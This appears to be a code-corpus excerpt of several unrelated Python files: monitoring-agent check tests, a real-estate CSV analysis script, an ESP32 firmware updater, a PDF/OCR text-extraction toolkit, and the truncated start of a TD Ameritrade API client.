c,i-1,0,0,0,1,,1,1,0,,0,,0,0,0,0,UP,1,1,0,0,1,1,30,,1,3,1,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
c,i-2,0,0,0,1,,1,1,0,,0,,0,0,0,0,DOWN (agent),1,1,0,0,1,1,30,,1,3,1,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
c,i-3,0,0,0,1,,1,1,0,,0,,0,0,0,0,NO CHECK,1,1,0,0,1,1,30,,1,3,1,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
c,BACKEND,0,0,1,2,0,421,1,0,0,0,,0,0,0,0,UP,6,6,0,,0,1,0,,1,3,0,,421,,1,0,,1,,,,,,,,,,,,,,0,0,
"""
AGG_STATUSES_BY_SERVICE = (
(['status:available', 'service:a'], 1),
(['status:available', 'service:b'], 4),
(['status:unavailable', 'service:b'], 2),
(['status:available', 'service:c'], 1),
(['status:unavailable', 'service:c'], 2)
)
AGG_STATUSES = (
(['status:available'], 6),
(['status:unavailable'], 4)
)
class TestCheckHAProxy(AgentCheckTest):
CHECK_NAME = 'haproxy'
BASE_CONFIG = {
'init_config': None,
'instances': [
{
'url': 'http://localhost/admin?stats',
'collect_status_metrics': True,
}
]
}
def _assert_agg_statuses(self, count_status_by_service=True, collate_status_tags_per_host=False):
expected_statuses = AGG_STATUSES_BY_SERVICE if count_status_by_service else AGG_STATUSES
for tags, value in expected_statuses:
if collate_status_tags_per_host:
# Assert that no aggregate statuses are sent
self.assertMetric('haproxy.count_per_status', tags=tags, count=0)
else:
self.assertMetric('haproxy.count_per_status', value=value, tags=tags)
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_per_status_agg_only(self, mock_requests):
config = copy.deepcopy(self.BASE_CONFIG)
# with count_status_by_service set to False
config['instances'][0]['count_status_by_service'] = False
self.run_check(config)
self.assertMetric('haproxy.count_per_status', value=2, tags=['status:open'])
self.assertMetric('haproxy.count_per_status', value=4, tags=['status:up'])
self.assertMetric('haproxy.count_per_status', value=2, tags=['status:down'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:maint'])
self.assertMetric('haproxy.count_per_status', value=0, tags=['status:nolb'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:no_check'])
self._assert_agg_statuses(count_status_by_service=False)
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_per_status_by_service(self, mock_requests):
self.run_check(self.BASE_CONFIG)
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:open', 'service:a'])
self.assertMetric('haproxy.count_per_status', value=3, tags=['status:up', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:open', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:down', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:maint', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:up', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:down', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['status:no_check', 'service:c'])
self._assert_agg_statuses()
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_per_status_by_service_and_host(self, mock_requests):
config = copy.deepcopy(self.BASE_CONFIG)
config['instances'][0]['collect_status_metrics_by_host'] = True
self.run_check(config)
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:FRONTEND', 'status:open', 'service:a'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:FRONTEND', 'status:open', 'service:b'])
for backend in ['i-1', 'i-2', 'i-3']:
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:%s' % backend, 'status:up', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-4', 'status:down', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-5', 'status:maint', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-1', 'status:up', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-2', 'status:down', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-3', 'status:no_check', 'service:c'])
self._assert_agg_statuses()
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_per_status_by_service_and_collate_per_host(self, mock_requests):
config = copy.deepcopy(self.BASE_CONFIG)
config['instances'][0]['collect_status_metrics_by_host'] = True
config['instances'][0]['collate_status_tags_per_host'] = True
self.run_check(config)
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:FRONTEND', 'status:available', 'service:a'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:FRONTEND', 'status:available', 'service:b'])
for backend in ['i-1', 'i-2', 'i-3']:
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:%s' % backend, 'status:available', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-4', 'status:unavailable', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-5', 'status:unavailable', 'service:b'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-1', 'status:available', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-2', 'status:unavailable', 'service:c'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-3', 'status:unavailable', 'service:c'])
self._assert_agg_statuses(collate_status_tags_per_host=True)
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_per_status_collate_per_host(self, mock_requests):
config = copy.deepcopy(self.BASE_CONFIG)
config['instances'][0]['collect_status_metrics_by_host'] = True
config['instances'][0]['collate_status_tags_per_host'] = True
config['instances'][0]['count_status_by_service'] = False
self.run_check(config)
self.assertMetric('haproxy.count_per_status', value=2, tags=['backend:FRONTEND', 'status:available'])
self.assertMetric('haproxy.count_per_status', value=2, tags=['backend:i-1', 'status:available'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-2', 'status:available'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-2', 'status:unavailable'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-3', 'status:available'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-3', 'status:unavailable'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-4', 'status:unavailable'])
self.assertMetric('haproxy.count_per_status', value=1, tags=['backend:i-5', 'status:unavailable'])
self._assert_agg_statuses(count_status_by_service=False, collate_status_tags_per_host=True)
# This mock is only useful to make the first `run_check` run w/o errors (which in turn is useful only to initialize the check)
@mock.patch('requests.get', return_value=mock.Mock(content=MOCK_DATA))
def test_count_hosts_statuses(self, mock_requests):
self.run_check(self.BASE_CONFIG)
data = """# pxname,svname,qcur,qmax,scur,smax,slim,stot,bin,bout,dreq,dresp,ereq,econ,eresp,wretr,wredis,status,weight,act,bck,chkfail,chkdown,lastchg,downtime,qlimit,pid,iid,sid,throttle,lbtot,tracked,type,rate,rate_lim,rate_max,check_status,check_code,check_duration,hrsp_1xx,hrsp_2xx,hrsp_3xx,hrsp_4xx,hrsp_5xx,hrsp_other,hanafail,req_rate,req_rate_max,req_tot,cli_abrt,srv_abrt,
a,FRONTEND,,,1,2,12,1,11,11,0,0,0,,,,,OPEN,,,,,,,,,1,1,0,,,,0,1,0,2,,,,0,1,0,0,0,0,,1,1,1,,,
a,BACKEND,0,0,0,0,12,0,11,11,0,0,,0,0,0,0,UP,0,0,0,,0,1221810,0,,1,1,0,,0,,1,0,,0,,,,0,0,0,0,0,0,,,,,0,0,
b,FRONTEND,,,1,2,12,11,11,0,0,0,0,,,,,OPEN,,,,,,,,,1,2,0,,,,0,0,0,1,,,,,,,,,,,0,0,0,,,
b,i-1,0,0,0,1,,1,1,0,,0,,0,0,0,0,UP 1/2,1,1,0,0,1,1,30,,1,3,1,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-2,0,0,1,1,,1,1,0,,0,,0,0,0,0,UP 1/2,1,1,0,0,0,1,0,,1,3,2,,71,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-3,0,0,0,1,,1,1,0,,0,,0,0,0,0,UP,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-4,0,0,0,1,,1,1,0,,0,,0,0,0,0,DOWN,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-5,0,0,0,1,,1,1,0,,0,,0,0,0,0,MAINT,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,BACKEND,0,0,1,2,0,421,1,0,0,0,,0,0,0,0,UP,6,6,0,,0,1,0,,1,3,0,,421,,1,0,,1,,,,,,,,,,,,,,0,0,
""".split('\n')
# per service
self.check._process_data(data, True, False, collect_status_metrics=True,
collect_status_metrics_by_host=False)
expected_hosts_statuses = defaultdict(int)
expected_hosts_statuses[('b', 'open')] = 1
expected_hosts_statuses[('b', 'up')] = 3
expected_hosts_statuses[('b', 'down')] = 1
expected_hosts_statuses[('b', 'maint')] = 1
expected_hosts_statuses[('a', 'open')] = 1
self.assertEquals(self.check.hosts_statuses, expected_hosts_statuses)
# backend hosts
agg_statuses = self.check._process_backend_hosts_metric(expected_hosts_statuses)
expected_agg_statuses = {
'a': {'available': 0, 'unavailable': 0},
'b': {'available': 3, 'unavailable': 2},
}
self.assertEquals(expected_agg_statuses, dict(agg_statuses))
# with process_events set to True
self.check._process_data(data, True, True, collect_status_metrics=True,
collect_status_metrics_by_host=False)
self.assertEquals(self.check.hosts_statuses, expected_hosts_statuses)
# per host
self.check._process_data(data, True, False, collect_status_metrics=True,
collect_status_metrics_by_host=True)
expected_hosts_statuses = defaultdict(int)
expected_hosts_statuses[('b', 'FRONTEND', 'open')] = 1
expected_hosts_statuses[('a', 'FRONTEND', 'open')] = 1
expected_hosts_statuses[('b', 'i-1', 'up')] = 1
expected_hosts_statuses[('b', 'i-2', 'up')] = 1
expected_hosts_statuses[('b', 'i-3', 'up')] = 1
expected_hosts_statuses[('b', 'i-4', 'down')] = 1
expected_hosts_statuses[('b', 'i-5', 'maint')] = 1
self.assertEquals(self.check.hosts_statuses, expected_hosts_statuses)
self.check._process_data(data, True, True, collect_status_metrics=True,
collect_status_metrics_by_host=True)
self.assertEquals(self.check.hosts_statuses, expected_hosts_statuses)
```
#### File: checks/mock/test_riakcs.py
```python
from socket import error
import unittest
# 3p
from mock import Mock
# project
from checks import AgentCheck
from tests.checks.common import AgentCheckTest, Fixtures, load_check
class RiakCSTest(AgentCheckTest):
CHECK_NAME = "riakcs"
def __init__(self, *args, **kwargs):
unittest.TestCase.__init__(self, *args, **kwargs)
self.config = {"instances": [{
"access_id":"foo",
"access_secret": "bar"}]}
self.check = load_check(self.CHECK_NAME, self.config, {})
self.check._connect = Mock(return_value=(None, None, ["aggregation_key:localhost:8080"]))
self.check._get_stats = Mock(return_value=self.check.load_json(
Fixtures.read_file('riakcs_in.json')))
def test_parser(self):
input_json = Fixtures.read_file('riakcs_in.json')
output_python = Fixtures.read_file('riakcs_out.python')
self.assertEquals(self.check.load_json(input_json), eval(output_python))
def test_metrics(self):
self.run_check(self.config)
expected = eval(Fixtures.read_file('riakcs_metrics.python'))
for m in expected:
self.assertMetric(m[0], m[2], m[3].get('tags', []))
def test_service_checks(self):
self.check = load_check(self.CHECK_NAME, self.config, {})
self.assertRaises(error, lambda: self.run_check(self.config))
self.assertEqual(len(self.service_checks), 1, self.service_checks)
self.assertServiceCheck(self.check.SERVICE_CHECK_NAME,
status=AgentCheck.CRITICAL,
tags=['aggregation_key:localhost:8080'])
```
#### File: checks/mock/test_yarn.py
```python
from urlparse import urljoin
# 3rd party
import mock
import json
from tests.checks.common import AgentCheckTest, Fixtures
# IDs
CLUSTER_NAME = 'SparkCluster'
# Resource manager URI
RM_ADDRESS = 'http://localhost:8088'
# Service URLs
YARN_CLUSTER_METRICS_URL = urljoin(RM_ADDRESS, '/ws/v1/cluster/metrics')
YARN_APPS_URL = urljoin(RM_ADDRESS, '/ws/v1/cluster/apps') + '?states=RUNNING'
YARN_NODES_URL = urljoin(RM_ADDRESS, '/ws/v1/cluster/nodes')
def requests_get_mock(*args, **kwargs):
class MockResponse:
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
def json(self):
return json.loads(self.json_data)
def raise_for_status(self):
return True
if args[0] == YARN_CLUSTER_METRICS_URL:
with open(Fixtures.file('cluster_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif args[0] == YARN_APPS_URL:
with open(Fixtures.file('apps_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif args[0] == YARN_NODES_URL:
with open(Fixtures.file('nodes_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
class YARNCheck(AgentCheckTest):
CHECK_NAME = 'yarn'
YARN_CONFIG = {
'resourcemanager_uri': 'http://localhost:8088',
'cluster_name': CLUSTER_NAME
}
YARN_CLUSTER_METRICS_VALUES = {
'yarn.metrics.apps_submitted': 0,
'yarn.metrics.apps_completed': 0,
'yarn.metrics.apps_pending': 0,
'yarn.metrics.apps_running': 0,
'yarn.metrics.apps_failed': 0,
'yarn.metrics.apps_killed': 0,
'yarn.metrics.reserved_mb': 0,
'yarn.metrics.available_mb': 17408,
'yarn.metrics.allocated_mb': 0,
'yarn.metrics.total_mb': 17408,
'yarn.metrics.reserved_virtual_cores': 0,
'yarn.metrics.available_virtual_cores': 7,
'yarn.metrics.allocated_virtual_cores': 1,
'yarn.metrics.total_virtual_cores': 8,
'yarn.metrics.containers_allocated': 0,
'yarn.metrics.containers_reserved': 0,
'yarn.metrics.containers_pending': 0,
'yarn.metrics.total_nodes': 1,
'yarn.metrics.active_nodes': 1,
'yarn.metrics.lost_nodes': 0,
'yarn.metrics.unhealthy_nodes': 0,
'yarn.metrics.decommissioned_nodes': 0,
'yarn.metrics.rebooted_nodes': 0,
}
YARN_CLUSTER_METRICS_TAGS = ['cluster_name:%s' % CLUSTER_NAME]
YARN_APP_METRICS_VALUES = {
'yarn.apps.progress': 100,
'yarn.apps.started_time': 1326815573334,
'yarn.apps.finished_time': 1326815598530,
'yarn.apps.elapsed_time': 25196,
'yarn.apps.allocated_mb': 0,
'yarn.apps.allocated_vcores': 0,
'yarn.apps.running_containers': 0,
'yarn.apps.memory_seconds': 151730,
'yarn.apps.vcore_seconds': 103,
}
YARN_APP_METRICS_TAGS = [
'cluster_name:%s' % CLUSTER_NAME,
'app_name:word count'
]
YARN_NODE_METRICS_VALUES = {
'yarn.node.last_health_update': 1324056895432,
'yarn.node.used_memory_mb': 0,
'yarn.node.avail_memory_mb': 8192,
'yarn.node.used_virtual_cores': 0,
'yarn.node.available_virtual_cores': 8,
'yarn.node.num_containers': 0,
}
YARN_NODE_METRICS_TAGS = [
'cluster_name:%s' % CLUSTER_NAME,
'node_id:h2:1235'
]
@mock.patch('requests.get', side_effect=requests_get_mock)
def test_check(self, mock_requests):
config = {
'instances': [self.YARN_CONFIG]
}
self.run_check(config)
# Check the YARN Cluster Metrics
for metric, value in self.YARN_CLUSTER_METRICS_VALUES.iteritems():
self.assertMetric(metric,
value=value,
tags=self.YARN_CLUSTER_METRICS_TAGS)
# Check the YARN App Metrics
for metric, value in self.YARN_APP_METRICS_VALUES.iteritems():
self.assertMetric(metric,
value=value,
tags=self.YARN_APP_METRICS_TAGS)
# Check the YARN Node Metrics
for metric, value in self.YARN_NODE_METRICS_VALUES.iteritems():
self.assertMetric(metric,
value=value,
tags=self.YARN_NODE_METRICS_TAGS)
``` |
{
"source": "joewill/PythonTenApps",
"score": 4
} |
#### File: PythonTenApps/9_real_estate_app/program.py
```python
import os
import csv
import statistics
from data_types import Purchase
def main():
print_header()
filename = get_data_file()
print(filename)
data = load_file(filename)
query_data(data)
def print_header():
print('-----------------------------------')
print(' REAL ESTATE DATE MINING APP ')
print('-----------------------------------')
print()
def get_data_file():
base_folder = os.path.dirname(__file__)
return os.path.join(base_folder, 'data', 'SacramentoRealEstateTransactions2008.csv')
def load_file(filename):
with open(filename, 'r', encoding='utf-8') as fin:
reader = csv.DictReader(fin)
purchases = []
for row in reader:
p = Purchase.create_from_dict(row)
purchases.append(p)
return purchases
def query_data(data):
data.sort(key=lambda p: p.price)
high_purchase = data[-1]
print("The most expensive house is ${:,} with {} beds and {} baths.".format(
high_purchase.price, high_purchase.beds, high_purchase.baths))
low_purchase = data[0]
print("The least expensive house is ${:,} with {} beds and {} baths.".format(
low_purchase.price, low_purchase.beds, low_purchase.baths))
prices = [
p.price # projection or itmes
for p in data # the set to process
]
avg_price = statistics.mean(prices)
print("The average home price is ${:,}".format(int(avg_price)))
two_bed_homes = [
p # projection or itmes
for p in data # the set to process
if p.beds == 2 # test / condition
]
avg_price = statistics.mean([p.price for p in two_bed_homes])
avg_baths = statistics.mean([p.baths for p in two_bed_homes])
avg_sqft = statistics.mean([p.sq__ft for p in two_bed_homes])
print("Average two bedroom home is ${:,}, baths={}, sq ft={:,}".format(
int(avg_price), round(avg_baths, 1), round(avg_sqft, 1)))
if __name__ == '__main__':
main()
``` |
{
"source": "joewittmer/Morserino-32-Firmware-Updater",
"score": 3
} |
#### File: Morserino-32-Firmware-Updater/src/erase_firmware_message_parser.py
```python
import sys
import threading
from show_timed_progress import show_timed_progress
class EraseFirmwareMessageParser(object):
result = False
def __init__(self, callback, stdout):
self.read_percentage_complete = False
self.stdout = stdout
self.hault = False
self.callback = callback
self.t = threading.Thread(
target=show_timed_progress, args=(20, self.__callback, lambda: self.hault),
)
def __callback(self, d: int):
save_stdout = sys.stdout
sys.stdout = self.stdout
self.callback(d)
sys.stdout = save_stdout
def parse(self, s):
if "Erasing flash" in s:
self.t.start()
elif "Chip erase completed successfully" in s:
self.result = True
self.hault = True
self.t.join()
```
#### File: Morserino-32-Firmware-Updater/src/morserino.py
```python
import os
import sys
import esptool
from custom_exception import CustomException
from erase_firmware_message_parser import EraseFirmwareMessageParser
from get_resource_path import get_resource_path
from image_info_validation_parser import ImageInfoValidationParser
from soc_info import SocInfo
from soc_info_message_parser import SocInfoMessageParser
from stdout_parser import StdoutParser
from update_firmware_message_parser import UpdateFirmwareMessageParser
class Morserino(object):
def __init__(self, port, baud, path):
self.update_command = self.__get_update_command(port, baud, path)
self.erase_command = self.__get_erase_command(port, baud)
self.info_command = self.__get_info_command(port, baud)
self.image_info_command = self.__get_image_info_command(port, baud, path)
def __get_update_command(self, port, baud, path):
otadata = get_resource_path("bin/boot_app0.bin")
bootloader = get_resource_path("bin/bootloader_qio_80m.bin")
app = path
partitionTable = get_resource_path("bin/morse_3_v3.0.ino.partitions.bin")
return [
"--chip",
"esp32",
"--port",
port,
"--baud",
baud,
"--before",
"default_reset",
"--after",
"hard_reset",
"write_flash",
"-z",
"--flash_mode",
"dio",
"--flash_freq",
"80m",
"0xe000",
otadata,
"0x1000",
bootloader,
"0x10000",
app,
"0x8000",
partitionTable,
]
def __get_erase_command(self, port, baud):
return [
"--chip",
"esp32",
"--port",
port,
"--baud",
baud,
"--before",
"default_reset",
"--after",
"hard_reset",
"erase_flash",
]
def __get_info_command(self, port, baud):
return [
"--chip",
"esp32",
"--port",
port,
"--baud",
baud,
"flash_id",
]
def __get_image_info_command(self, port, baud, path):
return ["--chip", "esp32", "--port", port, "--baud", baud, "image_info", path]
def validate_baud(self, baud, callback):
bauds = ["115200", "460800", "921600"]
if baud not in bauds:
raise CustomException(
"Invalid baud rate.%s%sPlease use a baud rate: 115200, 460800, or 921600."
% (os.linesep, os.linesep)
)
callback()
def validate_firmware(self, path, callback):
if not os.path.exists(path):
raise CustomException(
"Unable to open the file at %s%s%sPlease check the firmware file location and try again."
% (path, os.linesep, os.linesep)
)
imageInfoValidationParser = ImageInfoValidationParser()
save_stdout = sys.stdout
sys.stdout = StdoutParser(imageInfoValidationParser.parse)
try:
esptool.main(self.image_info_command)
except Exception as ex:
raise ex
finally:
sys.stdout = save_stdout
if imageInfoValidationParser.result:
callback()
else:
raise CustomException(
"Unable to verify the firmware file at %s%s%sPlease download the firmware file again and retry."
% (path, os.linesep, os.linesep)
)
def update_md5_checksum_table_with_single_checksum(self, checksum):
self.md5_checksum_table.append(str(checksum))
def check_firmware_against_known_md5_checksums(
self, path, show_md5, show_verification_passed
):
return self.__validate_md5_checksum(path, show_md5, show_verification_passed)
def get_info(self, callback=lambda: SocInfo()):
def bad_port_exception():
raise CustomException(
"Error connecting to morserino.%s%sPlease check the port is correct."
% (os.linesep, os.linesep)
)
socInfo = SocInfo()
socInfoMessageParser = SocInfoMessageParser(socInfo)
save_stdout = sys.stdout
sys.stdout = StdoutParser(socInfoMessageParser.parse)
try:
esptool.main(self.info_command)
except Exception:
raise bad_port_exception()
finally:
sys.stdout = save_stdout
if socInfoMessageParser.result:
callback(socInfo)
else:
raise bad_port_exception()
def erase(self, callback):
stdout = sys.stdout
eraseFirmwareParser = EraseFirmwareMessageParser(callback, stdout)
process_stdout = StdoutParser(eraseFirmwareParser.parse)
try:
sys.stdout = process_stdout
esptool.main(self.erase_command)
except Exception as ex:
raise ex
finally:
sys.stdout = stdout
if not eraseFirmwareParser.result:
raise CustomException(
"Error erasing morserino.%s%sPlease ask for assistance"
% (os.linesep, os.linesep)
)
def update(self, callback):
stdout = sys.stdout
updateFirmwareParser = UpdateFirmwareMessageParser(callback, sys.stdout)
process_stdout = StdoutParser(updateFirmwareParser.parse)
try:
sys.stdout = process_stdout
esptool.main(self.update_command)
except Exception as ex:
raise ex
finally:
sys.stdout = stdout
if not updateFirmwareParser.result:
raise CustomException(
"Error updating morserino.%s%sPlease ask for assistance"
% (os.linesep, os.linesep)
)
```
#### File: Morserino-32-Firmware-Updater/src/soc_info.py
```python
class SocInfo(object):
soc = ""
features = ""
mac = ""
crystal = ""
flash_size = ""
def __init__(self):
pass
``` |
{
"source": "joewiz/doc_processing_toolkit",
"score": 3
} |
#### File: doc_processing_toolkit/textextraction/extractors.py
```python
import glob
import logging
import os
import re
import shutil
import subprocess
import tempfile
from boto.s3.key import Key
from boto.s3.connection import S3Connection
"""
The functions below are minimal Python wrappers around Ghostscript, Tika, and
Tesseract. They are intended to simplify converting pdf files into usable text.
"""
class TextExtraction:
""" The TextExtraction class contains functions for extracting and saving
metadata and text from all files compatible with Apache Tika"""
def __init__(self, doc_path, tika_port=9998, host='localhost'):
self.doc_path = doc_path
self.root, self.extension = os.path.splitext(doc_path)
self.tika_port = tika_port
self.text_args = ['curl', '-T', doc_path,
'http://%s:%s/tika' % (host, tika_port),
'-s', '--header', 'Accept: text/plain']
self.metadata_args = ['curl', '-T', doc_path,
'http://%s:%s/meta' % (host, tika_port),
'-s', '--header', 'Accept: application/json']
def save(self, document, ext):
""" Save document to root location """
export_path = self.root + ext
with open(export_path, 'w') as f:
f.write(document)
def doc_to_text(self):
""" Converts a document to text using the Tika server """
document = subprocess.check_output(self.text_args)
logging.info("%s converted to text from pdf", self.doc_path)
return document
def extract_metadata(self):
"""
Extracts metadata using Tika into a json file
"""
metadata = subprocess.check_output(self.metadata_args)
self.save(metadata.decode('utf-8'), ext='_metadata.json')
def extract(self):
"""
Converts and extracts metadata for any document type compatiable
with Tika, (http://tika.apache.org/1.7/formats.html) but does not
check if extraction produces text.
"""
self.extract_metadata()
self.save(self.doc_to_text().decode('utf-8'), ext='.txt')
class PDFTextExtraction(TextExtraction):
""" PDFTextExtraction adds OCR functionality to TextExtraction. The ORC
functionality is triggered only if a PDF document is not responsive or
if Tika fails to extract text """
def __init__(self, doc_path, tika_port=9998,
host='localhost', word_threshold=10):
super().__init__(doc_path, tika_port, host)
self.WORDS = re.compile('[A-Za-z]{3,}')
self.word_threshold = word_threshold
def meets_len_threshold(self, doc_text):
"""
Return True if number of words in text are more than the threshold
"""
if len(tuple(self.WORDS.finditer(doc_text))) > self.word_threshold:
return True
def has_text(self):
"""
Using `pdffonts` returns True if document has fonts, which in
essence means it has text. If a document is not a pdf
automatically returns True.
"""
args = ['pdffonts', self.doc_path]
pdffonts_output = subprocess.Popen(
args,
stdout=subprocess.PIPE,
)
result = None
if pdffonts_output.communicate()[0].decode("utf-8").count("\n") > 2:
result = True
retcode = pdffonts_output.returncode
if retcode:
raise subprocess.CalledProcessError(retcode, args)
if result:
return result
def cat_and_clean(self, out_file, main_text_file):
""" Concatenates file to main text file and removes individual file """
out_file = out_file + '.txt'
with open(main_text_file, 'a') as append:
with open(out_file) as source:
shutil.copyfileobj(source, append)
os.remove(out_file)
def img_to_text(self):
""" Uses Tesseract OCR to convert png image to text file """
main_text_file = self.root + '.txt'
for png in sorted(glob.glob('%s_*.png' % self.root)):
out_file = png[:-4]
args = ['tesseract', png, out_file, '-l', 'eng']
doc_process = subprocess.Popen(
args=args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
doc_process.communicate()
if doc_process.returncode:
raise subprocess.CalledProcessError(doc_process.returncode,
args)
self.cat_and_clean(out_file, main_text_file)
logging.info("%s converted to text from image", self.root + '.png')
return main_text_file
def pdf_to_img(self):
""" Converts and saves pdf file to png image using Ghostscript"""
export_path = self.root + "_%03d.png"
args = [
'gs', '-dNOPAUSE', '-dBATCH', '-sDEVICE=pnggray',
'-dINTERPOLATE', '-r300', '-dNumRenderingThreads=8',
'-sOutputFile={0}'.format(export_path), self.doc_path
]
process = subprocess.Popen(
args=args, stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
process.communicate()
if process.returncode:
raise subprocess.CalledProcessError(process.returncode, args)
logging.info("%s converted to png images", self.doc_path)
return export_path
def extract(self):
"""
Converts pdfs to text and extracts metadata. Uses OCR if the
initial attempt fails.
"""
self.extract_metadata()
needs_ocr = False
# Determine if PDF has text
if not self.has_text():
needs_ocr = True
else:
doc_text = self.doc_to_text().decode('utf-8')
# Determine if extraction suceeded
if self.meets_len_threshold(doc_text):
self.save(doc_text, ext='.txt')
else:
needs_ocr = True
if needs_ocr:
self.pdf_to_img()
self.img_to_text()
class TextExtractionS3(TextExtraction):
def __init__(self, file_key, s3_bucket, tika_port=9998, host='localhost'):
""" Connects to s3 bucket and downloads file into a temp dir
before using super to initalize like TextExtraction """
self.file_key = file_key
self.s3_bucket = s3_bucket
self.temp = tempfile.TemporaryDirectory()
doc_path = os.path.join(self.temp.name, os.path.basename(file_key))
k = Key(self.s3_bucket)
k.key = self.file_key
k.get_contents_to_filename(doc_path)
super().__init__(doc_path, tika_port, host)
def save(self, document, ext):
""" Save document to s3 """
root, old_ext = os.path.splitext(self.file_key)
s3_path = root + ext
k = Key(self.s3_bucket)
k.key = s3_path
k.set_contents_from_string(str(document))
class PDFTextExtractionS3(TextExtractionS3, PDFTextExtraction):
def __init__(self, file_key, s3_bucket, tika_port=9998, host='localhost',
word_threshold=10):
TextExtractionS3.__init__(self, file_key, s3_bucket, tika_port, host)
self.WORDS = re.compile('[A-Za-z]{3,}')
self.word_threshold = word_threshold
def img_to_text(self):
""" Extends img_to_text from PDFTextExtraction and adds a s3 save
function """
main_text_file = super().img_to_text()
local_base, text_file_name = os.path.split(main_text_file)
s3_base, s3_doc_name = os.path.split(self.file_key)
k = Key(self.s3_bucket)
k.key = os.path.join(s3_base, text_file_name)
k.set_contents_from_filename(main_text_file)
def text_extractor(doc_path, force_convert=False):
"""Checks if document has been converted and sends file to appropriate
converter"""
root, extension = os.path.splitext(doc_path)
if not os.path.exists(root + ".txt") or force_convert:
if extension == '.pdf':
extractor = PDFTextExtraction(doc_path)
else:
extractor = TextExtraction(doc_path)
extractor.extract()
def text_extractor_s3(file_key, s3_bucket, force_convert=True):
""" Checks if document has been converted in s3 bucket and and sends file
to appropriate converter"""
root, extension = os.path.splitext(file_key)
if not force_convert:
if len(list(s3_bucket.list(root + '.txt'))) > 0:
logging.info("%s has already been converted", file_key)
return
if extension == ".pdf":
extractor = PDFTextExtractionS3(file_key, s3_bucket)
else:
extractor = TextExtractionS3(file_key, s3_bucket)
logging.info("%s is being converted", file_key)
extractor.extract()
``` |
{
"source": "joe-wojniak/project_portfolio",
"score": 3
} |
#### File: joe-wojniak/project_portfolio/denali.py
```python
import os
import json
import csv
import pandas as pd
'''
# Purpose: Denali retrieves data from TD Ameritrade's API.
# Requisites:
# (1) TDAmeritrade.com account
# (2) developer.TDAmeritrade.com account
# (3) an app created on the TD Ameritrade developer account
# (4) client_id stored as an environment variable
# (5) a refresh token stored as an environment variable
# TD Ameritrade recommends a manual process for requesting a refresh token.
# Ref: TDAmeritradeOAuth2Notes2021.txt
# TD Ameritrade token server url:
# https://api.tdameritrade.com/v1/oauth2/token
# The TD Ameritrade API is the resource server that provides the protected resources when
# a valid request is received with an access token.
# TD Ameritrade resource server base url:
# https://api.tdameritrade.com/v1
'''
from sanction import Client
import time
# Background info for Sanction and its functions:
# https://sanction.readthedocs.io/en/latest/
# https://docs.python.org/2.6/library/urllib2.html
def api_pricehistory(symbol):
# Price History API
url = '/{0}/pricehistory'.format(symbol)
querystring = '?apikey={0}&period=6&frequencyType=daily&frequency=1'.format(client_id)
# url = url+querystring # querystring not used- throwing errors
# print statements are used for verbose output:
# print('constructed url with query string:')
# print(url)
headers = {'Authorization': 'Bearer {0}'.format(c.access_token)}
# print('client app constructed header:')
# print(headers)
# API requests are throttled to 120 requests / minute or 1 request every 0.5 sec
data = c.request(url=url, headers=headers)
time.sleep(0.5) # 0.5 sec delay per required API request rate <= 0.5 sec
return data
def api_chains(symbol, strikeCount, includeQuotes, strategy, interval, options_range, fromDate, toDate, expMonth):
# Option Chains API
url ='/chains'
querystring= '?apikey={0}&symbol={1}&strikeCount={2}&includeQuotes={3}&strategy={4}&interval={5}&range={6}\
